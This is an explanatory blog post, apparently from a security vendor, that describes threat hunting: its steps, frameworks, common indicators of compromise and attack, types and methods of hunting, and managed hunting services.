What is threat hunting in cybersecurity? How does it work? 

10 Feb 2022

Cyber threats appear to be lurking around every corner in today’s technologically driven world. Half the battle lies in recognizing the dangers and assessing the risks associated with those threats. However, understanding how to search for them in advance proactively can save a great difficult situation, time, and cost. This is where Threat Hunting comes into the picture.

What is threat hunting?

Threat hunting is a proactive method in cybersecurity where threat experts hunt for unknown, ongoing, and unaddressed threats across an organization’s network. It leverages different tactics, techniques, and strategies to identify if there are threats across a network that are not detected yet.

What is the primary goal of threat hunting? Why is it important?

The primary purpose of threat hunting is to catch threat actors/threats before they make their move. It aims to identify any ongoing suspicious activities/potential incidents before they cause damage to the infrastructure or have a significant adverse impact on the organization. It assists cybersecurity teams in enhancing cyber readiness against threats. The data from a threat-hunting activity can be useful for devising an effective incident response strategy.

What are the benefits of threat hunting?

The following are the reasons why threat hunting is an essential part of security:

Step 1: Frame hypothesis – based on threat intel sources, known TTPs

Step 2: Gather data – from multiple endpoints across infrastructure based on hypothesis

Step 3: Identify triggers – anomalous/unusual actions that point towards suspicious activities that may need to be further investigation

Step 4: Investigate – analyze the triggers that can be IoCs (Indicators of Compromise) and IoAs (Indicators of Attack)

Step 5: Resolve – communicate with relevant teams for deployment of incident response

What does a typical threat hunting framework look like?

A typical threat hunting framework will have activities like:

  • Curate Indicators of Compromise with contextual information from SIEM and threat intelligence
  • Understand the baseline conditions with
  • Frame a threat hunting hypothesis
  • Collect data from the environment – could be anything from alerts from a database to forums
  • Engage in hypothesis-based scanning of the environment for threats
  • Correlate with existing methodologies – like NIST and MITRE ATT&CK Framework

What are some of the common IoCs and IoAs searched for in a threat hunting activity?

Some important Indicators of Compromise searched for in a threat hunting activity are:

  • Hash Values
  • IP Address
  • Domain Names     
  • TTPs
  • Tools
  • Network/Hosts

Common examples of Indicators of Attack (IoA) looked for in threat hunting activity include:

  • Unexpected activities on the network like excess data suddenly transferred to an IP address
  • A surge in access requests
  • Unauthorized modifications in files
  • Installation of unauthorized software
  • Modification of system configurations

What is a TTP in threat hunting?

As per MITRE, TTP-based hunting involves collecting and filtering data based on the knowledge of adversary tactics, techniques, and procedures for detecting malicious activity.  

It is a robust approach that looks for techniques that adversaries will use to achieve all their objectives.  These include the tactics techniques and procedures that are common across adversaries.

What are the different kinds of threat hunting? What are the different methods of threat hunting?

There are three kinds and methods of threat hunting that are commonly used:

Types of threat hunting  Methods/Models  
Structured – Hunts are based on the TTPs deployed by an attacker and leverage the MITRE ATT&CK framework, proactively identifying actors before they make a move.   Hypothesis-based – proactive approach that uses hypothesis made using MITRE ATT&CK framework-based playbooks, IoAs, and TTPs. Hunters catch and isolate threats based on the hypothesis.   
Unstructured – Hunts are based on IoC-based triggers and threat intelligence. Threat hunters look for patterns after and before detections, going back to the root cause before detection.    Intel-based – Hunt is performed using intel shared by intelligence agencies, including IoCs, IP addresses, networks, host artifacts, and domain names  
Situational – hunts are based on a hypothesis of a situation (an attack) and industry-based methods   Custom -Tailored threat hunting activity that is based on customer scope and can use elements from Intel-based and Hypothesis-based hunting.  

 

What is cloud threat hunting?

It is threat hunting focused on cloud-based attackers that deploy different TTPs to bypass cloud security measures and leverage security weaknesses on the cloud. Hunters use advanced tools and based telemetry to hunt for undiscovered, ongoing, and hidden threats.   

What do you need to perform threat hunting?

The following are some of the things that are needed to perform an effective threat hunting activity:

Human threat hunters – they are critical along with automated detection solutions to perform an effective threat-hunting activity

Technology – A security solution that performs security data ingestion and storage, offering visibility across infrastructure like EDR/SIEM/XDR

Threat Intelligence – Latest intelligence on threat actors including their trends, security vulnerabilities leveraged, tactics, techniques and procedures deployed, etc.

What is managed threat hunting?

Not every organization would have its own security solution and team of cybersecurity experts who can perform threat hunting for them given the rising cost of security solutions and growing cybersecurity skills gap. For those businesses, there is a managed threat hunting service. It utilizes an external team of cybersecurity professionals well-versed in the different techniques, tools, and expertise in threat hunting and incident response.

Get in Touch With us

Complete Visibility, Continuous Monitoring & Advanced Threat Protection with AI-backed Incident Remediation.

LEARN MORE